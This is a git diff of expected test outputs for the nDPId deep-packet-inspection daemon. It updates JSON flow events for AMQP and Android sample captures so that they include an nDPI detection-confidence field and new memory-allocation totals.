 00564{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":17,"source":"amqp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490904169152,"flow_last_seen":1490904169152,"flow_idle_time":7440000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":1,"ts_msec":1490904169152,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.1.1","src_port":44206,"dst_port":5672,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"amqp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1490904169152,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":97,"pkt_l4_len":63,"ts_msec":1490904169152,"pkt":"AAAAAAAAAAAAAAAACABFAABTPztAAEAG\/Gd\/AAABfwABAayuFiiKm04N2t+K4IAYAV7\/RwAAAQEICgC+2LgAvtO2AQABAAAAFwA8ACgAAAdkZWZhdWx0B3Rhc2tzLiMAzg=="}
-00593{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"amqp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490904169152,"flow_last_seen":1490904169152,"flow_idle_time":7440000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":1,"ts_msec":1490904169152,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.1.1","src_port":44206,"dst_port":5672,"l4_proto":"tcp","ndpi": {"proto":"AMQP","breed":"Acceptable","category":"RPC"}}
+00619{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"amqp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490904169152,"flow_last_seen":1490904169152,"flow_idle_time":7440000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":1,"ts_msec":1490904169152,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.1.1","src_port":44206,"dst_port":5672,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"AMQP","breed":"Acceptable","category":"RPC"}}
 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"amqp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1490904169152,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1490904169152,"pkt":"AAAAAAAAAAAAAAAACABFAAA01sFAAEAGZQB\/AAEBfwAAARYorK7a34rgiptOLIAQDAj\/KAAAAQEICgC+2LgAvti4"}
 00649{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"amqp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1490904169152,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"ts_msec":1490904169152,"pkt":"AAAAAAAAAAAAAAAACABFAADAPzxAAEAG+\/l\/AAABfwABAayuFiiKm04s2t+K4IAYAV7\/tAAAAQEICgC+2LgAvti4AgABAAAAhAA8AAAAAAAAAAAA7v4AHmFwcGxpY2F0aW9uL3gtcHl0aG9uLXNlcmlhbGl6ZQZiaW5hcnkAAAAAAgAkZjMzYWFlMjctNjlmNC00ZjQ4LWIwYmMtMmVmZGM0NTVjMTI4JGFiZjI3YmI1LTAxNDktM2RiZC1hMmRiLWQzNTcyYzMwOTc5MM4="}
-00596{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"amqp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490904166119,"flow_last_seen":1490904169156,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":448,"flow_tot_l4_payload_len":1342,"flow_avg_l4_payload_len":191,"midstream":1,"ts_msec":1490904169156,"l3_proto":"ip4","src_ip":"127.0.1.1","dst_ip":"127.0.0.1","src_port":5672,"dst_port":44204,"l4_proto":"tcp","ndpi": {"proto":"AMQP","breed":"Acceptable","category":"RPC"}}
-00637{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":160,"source":"amqp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1490904166119,"flow_last_seen":1490904170242,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":448,"flow_tot_l4_payload_len":3574,"flow_avg_l4_payload_len":162,"midstream":1,"ts_msec":1490904170243,"l3_proto":"ip4","src_ip":"127.0.1.1","dst_ip":"127.0.0.1","src_port":5672,"dst_port":44204,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"AMQP","breed":"Acceptable","category":"RPC"}}
-00637{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":160,"source":"amqp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":108,"flow_first_seen":1490904166118,"flow_last_seen":1490904170243,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":329,"flow_tot_l4_payload_len":7295,"flow_avg_l4_payload_len":67,"midstream":1,"ts_msec":1490904170243,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.1.1","src_port":44205,"dst_port":5672,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"AMQP","breed":"Acceptable","category":"RPC"}}
-00636{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":160,"source":"amqp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1490904169152,"flow_last_seen":1490904170195,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":246,"flow_tot_l4_payload_len":2085,"flow_avg_l4_payload_len":69,"midstream":1,"ts_msec":1490904170243,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.1.1","src_port":44206,"dst_port":5672,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"AMQP","breed":"Acceptable","category":"RPC"}}
+00622{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"amqp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490904166119,"flow_last_seen":1490904169156,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":448,"flow_tot_l4_payload_len":1342,"flow_avg_l4_payload_len":191,"midstream":1,"ts_msec":1490904169156,"l3_proto":"ip4","src_ip":"127.0.1.1","dst_ip":"127.0.0.1","src_port":5672,"dst_port":44204,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"AMQP","breed":"Acceptable","category":"RPC"}}
+00663{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":160,"source":"amqp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1490904166119,"flow_last_seen":1490904170242,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":448,"flow_tot_l4_payload_len":3574,"flow_avg_l4_payload_len":162,"midstream":1,"ts_msec":1490904170243,"l3_proto":"ip4","src_ip":"127.0.1.1","dst_ip":"127.0.0.1","src_port":5672,"dst_port":44204,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AMQP","breed":"Acceptable","category":"RPC"}}
+00663{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":160,"source":"amqp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":108,"flow_first_seen":1490904166118,"flow_last_seen":1490904170243,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":329,"flow_tot_l4_payload_len":7295,"flow_avg_l4_payload_len":67,"midstream":1,"ts_msec":1490904170243,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.1.1","src_port":44205,"dst_port":5672,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AMQP","breed":"Acceptable","category":"RPC"}}
+00662{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":160,"source":"amqp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1490904169152,"flow_last_seen":1490904170195,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":246,"flow_tot_l4_payload_len":2085,"flow_avg_l4_payload_len":69,"midstream":1,"ts_msec":1490904170243,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.1.1","src_port":44206,"dst_port":5672,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AMQP","breed":"Acceptable","category":"RPC"}}
 00154{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":160,"source":"amqp.pcap","alias":"nDPId-test","total-events-serialized":20}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 160/160
@@ -26,9 +26,9 @@
 ~~ total active/idle flows...: 3/3
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4608013 bytes
-~~ total memory freed........: 4608013 bytes
-~~ total allocations/frees...: 99722/99722
+~~ total memory allocated....: 4692310 bytes
+~~ total memory freed........: 4692310 bytes
+~~ total allocations/frees...: 101312/101312
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 159 chars
 ~~ json string max len.......: 1064 chars
diff --git a/test/results/android.pcap.out b/test/results/android.pcap.out
index 648f520b2..d1e771edd 100644
--- a/test/results/android.pcap.out
+++ b/test/results/android.pcap.out
@@ -11,7 +11,7 @@
 00567{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"android.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1582454780907,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":143,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":143,"pkt_l4_len":109,"ts_msec":1582454780907,"pkt":"xGGLNYKpxiwDYGpkCABFAACBAr0AAC4GBL4R+LBLwKgCEQG7xZQAd+\/fhij6wYAZBTC0SwAAAQEIClsVz4YR3+\/bFwMDACkAAAAAAAAACH\/oI1Kw++l3rtTYoEdnoXbMNGznM5xRQS6qcOaP89cv8RUDAwAaAAAAAAAAAAnrqqMQkS3NHZ5e5TBif0pBf0U="}
 00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"android.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454784313,"flow_last_seen":1582454784313,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"ts_msec":1582454784313,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00842{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"android.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1582454784313,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"ts_msec":1582454784313,"pkt":"\/\/\/\/\/\/\/\/2DBiVgAcCABFAAFIeDQAAP8RQnEAAAAA\/\/\/\/\/wBEAEMBNI1GAQEGAHhURwsAAAAAAAAAAAAAAAAAAAAAAAAAANgwYlYAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEBNwoBeQMGD3f8XywuOQIF3D0HAdgwYlYAHDMEAHanAAwKTHVjYXMtaU1hY\/8AAAAAAAAAAAAAAAAA"}
-00699{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"android.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454784313,"flow_last_seen":1582454784313,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"ts_msec":1582454784313,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"lucas-imac","fingerprint":"1,121,3,6,15,119,252,95,44,46","class_ident":""}}
+00725{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"android.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454784313,"flow_last_seen":1582454784313,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"ts_msec":1582454784313,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"lucas-imac","fingerprint":"1,121,3,6,15,119,252,95,44,46","class_ident":""}}
 00842{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"android.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1582454786281,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"ts_msec":1582454786281,"pkt":"\/\/\/\/\/\/\/\/2DBiVgAcCABFAAFIeDUAAP8RQnAAAAAA\/\/\/\/\/wBEAEMBNI1EAQEGAHhURwsAAgAAAAAAAAAAAAAAAAAAAAAAANgwYlYAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEBNwoBeQMGD3f8XywuOQIF3D0HAdgwYlYAHDMEAHanAAwKTHVjYXMtaU1hY\/8AAAAAAAAAAAAAAAAA"}
 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":16,"source":"android.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454787658,"flow_last_seen":1582454787658,"flow_idle_time":7440000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":1,"ts_msec":1582454787658,"l3_proto":"ip4","src_ip":"17.248.185.10","dst_ip":"192.168.2.17","src_port":443,"dst_port":50702,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"android.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1582454787658,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":97,"pkt_l4_len":63,"ts_msec":1582454787658,"pkt":"xGGLNYKpxiwDYGpkCABFAgBThkMAADAGdqQR+LkKwKgCEQG7xg7EYLJptSIfH4AYBDV85QAAAQEIChoMpyQR4cyfFQMDABoAAAAAAAAAArlWa60ADWOMgYlfYrlhFGv+Kg=="}
@@ -20,144 +20,144 @@
 00842{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"android.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1582454789207,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"ts_msec":1582454789207,"pkt":"\/\/\/\/\/\/\/\/2DBiVgAcCABFAAFIeDYAAP8RQm8AAAAA\/\/\/\/\/wBEAEMBNI1BAQEGAHhURwsABQAAAAAAAAAAAAAAAAAAAAAAANgwYlYAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEBNwoBeQMGD3f8XywuOQIF3D0HAdgwYlYAHDMEAHanAAwKTHVjYXMtaU1hY\/8AAAAAAAAAAAAAAAAA"}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24,"source":"android.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454792980,"flow_last_seen":1582454792980,"flow_idle_time":180000,"flow_min_l4_payload_len":510,"flow_max_l4_payload_len":510,"flow_tot_l4_payload_len":510,"flow_avg_l4_payload_len":510,"midstream":0,"ts_msec":1582454792980,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01117{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"android.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1582454792980,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":552,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":552,"pkt_l4_len":518,"ts_msec":1582454792980,"pkt":"\/\/\/\/\/\/\/\/xiwDYGpkCABFAAIangkAAEARVHnAqAIBwKgC\/0RcRFwCBr34eyJ2ZXJzaW9uIjogWzIsIDBdLCAicG9ydCI6IDE3NTAwLCAiaG9zdF9pbnQiOiAzMzA0MDI2MjQwMTMxNjcxMTI3MTc3MTQ1ODMyOTcxNTM2ODg0ODIsICJkaXNwbGF5bmFtZSI6ICIiLCAibmFtZXNwYWNlcyI6IFsyNzUwMzcwNTYwLCA3ODUyNjYxNzcsIDE1MjYyNjMwNDUsIDEzMzg2NTkyMDEsIDE0ODE5MzM3LCA0ODEwNTkxNzYwLCA0NTE0NzI2NTgsIDczNjM0MTUyOCwgOTM4ODEzODQ5LCAxMjY3Njk1MTA5LCA1NDQwNDA3MDcyLCA1ODM0NDk5NiwgOTk2MzA2MjE1LCA1MzAzMzAxMjQ4LCAyODUyMTYwNywgNDA1NjQ2MjU5MiwgNzA1MzYyNzE4NCwgMTUyMjE3NzU4NywgMTQyMTExNDM5OSwgMTI1MjExNjQyOSwgOTk0Njk3NzMsIDcwNzk2MzY2ODgsIDE3Njk2NDMwNywgMTI1NTQwNTY2LCAxMDQ3NDI4MTg5LCA0NzE2MTkwMDQ4LCA1NDY3MTYzMDg4LCAxMTk1MDQ0MDcxLCA5Njg1MzIyNCwgMTc2MDk5NjMsIDY0NzgzMDM0NDAsIDUxMTcwNjY0MiwgNjI5Nzk1NTE4NCwgMTQxNTYyMDM1MF19"}
-00611{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"android.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454792980,"flow_last_seen":1582454792980,"flow_idle_time":180000,"flow_min_l4_payload_len":510,"flow_max_l4_payload_len":510,"flow_tot_l4_payload_len":510,"flow_avg_l4_payload_len":510,"midstream":0,"ts_msec":1582454792980,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
+00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"android.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454792980,"flow_last_seen":1582454792980,"flow_idle_time":180000,"flow_min_l4_payload_len":510,"flow_max_l4_payload_len":510,"flow_tot_l4_payload_len":510,"flow_avg_l4_payload_len":510,"midstream":0,"ts_msec":1582454792980,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":27,"source":"android.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454796360,"flow_last_seen":1582454796360,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1582454796360,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"android.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1582454796360,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1582454796360,"pkt":"\/\/\/\/\/\/\/\/xiwDYGpkCABFAABIV+oAAEARnGrAqAIBwKgC\/+EV4RUANNgcU3BvdFVkcDDcFXQoLlJiTAABAARIlcIDokHeIIm5eNggVkvVDJHA6KPmCng="}
-00607{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"android.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454796360,"flow_last_seen":1582454796360,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1582454796360,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","ndpi": {"proto":"Spotify","breed":"Acceptable","category":"Music"}}
+00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"android.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454796360,"flow_last_seen":1582454796360,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1582454796360,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}}
 01118{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"android.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1582454823029,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":552,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":552,"pkt_l4_len":518,"ts_msec":1582454823029,"pkt":"\/\/\/\/\/\/\/\/xiwDYGpkCABFAAIavtMAAEARM6\/AqAIBwKgC\/0RcRFwCBr34eyJ2ZXJzaW9uIjogWzIsIDBdLCAicG9ydCI6IDE3NTAwLCAiaG9zdF9pbnQiOiAzMzA0MDI2MjQwMTMxNjcxMTI3MTc3MTQ1ODMyOTcxNTM2ODg0ODIsICJkaXNwbGF5bmFtZSI6ICIiLCAibmFtZXNwYWNlcyI6IFsyNzUwMzcwNTYwLCA3ODUyNjYxNzcsIDE1MjYyNjMwNDUsIDEzMzg2NTkyMDEsIDE0ODE5MzM3LCA0ODEwNTkxNzYwLCA0NTE0NzI2NTgsIDczNjM0MTUyOCwgOTM4ODEzODQ5LCAxMjY3Njk1MTA5LCA1NDQwNDA3MDcyLCA1ODM0NDk5NiwgOTk2MzA2MjE1LCA1MzAzMzAxMjQ4LCAyODUyMTYwNywgNDA1NjQ2MjU5MiwgNzA1MzYyNzE4NCwgMTUyMjE3NzU4NywgMTQyMTExNDM5OSwgMTI1MjExNjQyOSwgOTk0Njk3NzMsIDcwNzk2MzY2ODgsIDE3Njk2NDMwNywgMTI1NTQwNTY2LCAxMDQ3NDI4MTg5LCA0NzE2MTkwMDQ4LCA1NDY3MTYzMDg4LCAxMTk1MDQ0MDcxLCA5Njg1MzIyNCwgMTc2MDk5NjMsIDY0NzgzMDM0NDAsIDUxMTcwNjY0MiwgNjI5Nzk1NTE4NCwgMTQxNTYyMDM1MF19"}
 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":43,"source":"android.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454823653,"flow_last_seen":1582454823653,"flow_idle_time":180000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":45,"midstream":0,"ts_msec":1582454823653,"l3_proto":"ip4","src_ip":"169.254.225.216","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"android.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1582454823653,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":87,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":87,"pkt_l4_len":53,"ts_msec":1582454823653,"pkt":"AQBeAAD72DBiVgAcCABFAABJmVsAAP8RtXWp\/uHY4AAA+xTpFOkANUGgAAAAAAABAAAAAAAAEF9zcG90aWZ5LWNvbm5lY3QEX3RjcAVsb2NhbAAADAAB"}
-00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":43,"source":"android.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454823653,"flow_last_seen":1582454823653,"flow_idle_time":180000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":45,"midstream":0,"ts_msec":1582454823653,"l3_proto":"ip4","src_ip":"169.254.225.216","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_spotify-connect._tcp.local"}}
